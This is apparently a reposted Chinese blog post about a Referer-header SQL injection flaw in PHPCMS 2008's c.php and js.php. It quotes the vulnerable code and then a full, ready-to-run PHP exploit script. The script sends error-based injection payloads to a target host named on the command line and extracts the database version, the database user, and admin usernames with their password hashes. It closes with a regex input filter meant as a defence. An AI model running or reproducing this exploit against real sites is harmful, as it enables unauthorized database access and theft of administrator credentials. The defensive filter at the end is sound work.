require './ads/include/common.inc.php';
require 'f.php'; //此处为我加入的 防止 referer 攻击的代码,再下面 会介绍 f.php
$id = intval($id);
$ads = $c_ads->get_info($id);
if($ads)
{
$db->query("UPDATE ".DB_PRE."ads SET `clicks`=clicks+1 WHERE adsid=".$ads['adsid']);
$info['username'] = $_username;
$info['clicktime'] = time();
$info['ip'] = IP;
$info['adsid'] = $id;
$info['referer'] = HTTP_REFERER; // 没做任何处理 www.it165.net
$year = date('ym',TIME);
$table = DB_PRE.'ads_'.$year;
$table_status = $db->table_status($table);
if(!$table_status) {
include MOD_ROOT.'include/create.table.php';
}
$db->insert($table, $info); //没做操作直接和数据库进行操作
$url = strpos($ads['linkurl'], 'http://')===FALSE ? 'http://'.$ads['linkurl'] : $ads['linkurl'];
}
?>
*********************************渗透代码ERP**********************************************
/**
* Created BY 独自等待
* Date : 13-5-29
* Time : 下午2:40
* FileName : phpcms2008_c.php
* 欢迎访问独自等待博客www.waitalone.cn
*/
print_r('
+------------------------------------------------------+
PHPCMS2008 c.php/js.php 注入EXP
Site:http://www.waitalone.cn/
Exploit BY: 独自等待
Time:2013-05-29
+------------------------------------------------------+
');
if ($argc < 4) {
print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path type
Host: target server (ip/hostname)
Path: path of phpcms
Type: type=1->c.php type=2->js.php
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
');
exit;
}
error_reporting(7);
//统计时间
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
$type = $argv[3];
switch ($type) {
case 1:
$url = '/c.php?id=1';
break;
case 2:
$url = '/data/js.php?id=1';
break;
default:
echo '请输入注入页面1或者2' . "\n";
exit;
}
//数据库版本
$cmd1 = "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$db_ver = get_info($cmd1);
//数据库用户
$cmd2 = "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$db_user = get_info($cmd2);
//获取用户表
$cmd3 = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() and table_name like '%_member%' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$member = get_info($cmd3);
//获取管理员数量
$cmd4 = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,count(*),0x7e) FROM $member where groupid=1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$ad_count = get_info($cmd4);
//显示注入数据
if (preg_match('/MySQL Query/i', send_pack('\&;'))) {
echo '数据库版本: ' . $db_ver . "\n";
echo '数据库用户: ' . $db_user . "\n";
echo '管理员个数: ' . $ad_count . "\n";
//获取多个管理员
foreach (range(0, ($ad_count - 1)) as $i) {
$cmd5 = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,username,0x3a,password,0x7e) FROM $member where groupid=1 LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
echo '管理员' . $i . '-->' . get_info($cmd5) . "\n";
}
} else {
exit("报告大人,网站不存在此漏洞,请更换注入页面试试!\n");
}
//发送数据包函数
function send_pack($cmd)
{
global $host, $path, $url;
$data = "GET " . $path . "$url HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
//$data .= "User-Agent: Baiduspider\r\n";
$data .= "Referer: " . $cmd . "\r\n";
$data .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($host, 80, $errno, $errstr, 10);
//echo ini_get('default_socket_timeout');//默认超时时间为60秒
if (!$fp) {
echo $errno . '-->' . $errstr . "\n";
exit('Could not connect to: ' . $host);
} else {
fwrite($fp, $data);
$back = '';
while (!feof($fp)) {
$back .= fread($fp, 1024);
}
fclose($fp);
}
return $back;
}
//提取返回信息
function get_info($info)
{
preg_match('/~(.*)~1/i', send_pack($info), $admin_match);
if (preg_match('/charset=utf-8/i', send_pack($info))) {
return iconv('utf-8', 'gbk//IGNORE', $admin_match[1]);
} else {
return $admin_match[1];
}
}
//时间统计函数
function func_time()
{
list($microsec, $sec) = explode(' ', microtime());
return $microsec + $sec;
}
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?>
*********************************f .php 攻击代码**********************************************
$referer=empty($_SERVER['HTTP_REFERER']) ? array() : array($_SERVER['HTTP_REFERER']);
function customError($errno, $errstr, $errfile, $errline)
{
echo "Error number: [$errno],error on line $errline in $errfile
";
die();
}
set_error_handler("customError",E_ERROR);
$getfilter="'|\b(alert|confirm|prompt)\b|]*?>|^\\+\/v(8|9)|\\b(and|or)\\b.+?(>|
$postfilter="^\\+\/v(8|9)|\\b(and|or)\\b.{1,6}?(=|>|
$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){
$StrFiltValue=arr_foreach($StrFiltValue);
if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){
print "
您的提交带有不合法参数,谢谢合作!
exit();
}
if (preg_match("/".$ArrFiltReq."/is",$StrFiltKey)==1){
print "
您的提交带有不合法参数,谢谢合作!
exit();
}
}
//$ArrPGC=array_merge($_GET,$_POST,$_COOKIE);
foreach($_GET as $key=>$value){
StopAttack($key,$value,$getfilter);
}
foreach($_POST as $key=>$value){
StopAttack($key,$value,$postfilter);
}
foreach($_COOKIE as $key=>$value){
StopAttack($key,$value,$cookiefilter);
}
foreach($referer as $key=>$value){
StopAttack($key,$value,$getfilter);
}
function arr_foreach($arr) {
static $str;
if (!is_array($arr)) {
return $arr;
}
foreach ($arr as $key => $val ) {
if (is_array($val)) {
arr_foreach($val);
} else {
$str[] = $val;
}
}
return implode($str);
}
?>
扫一扫
442
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
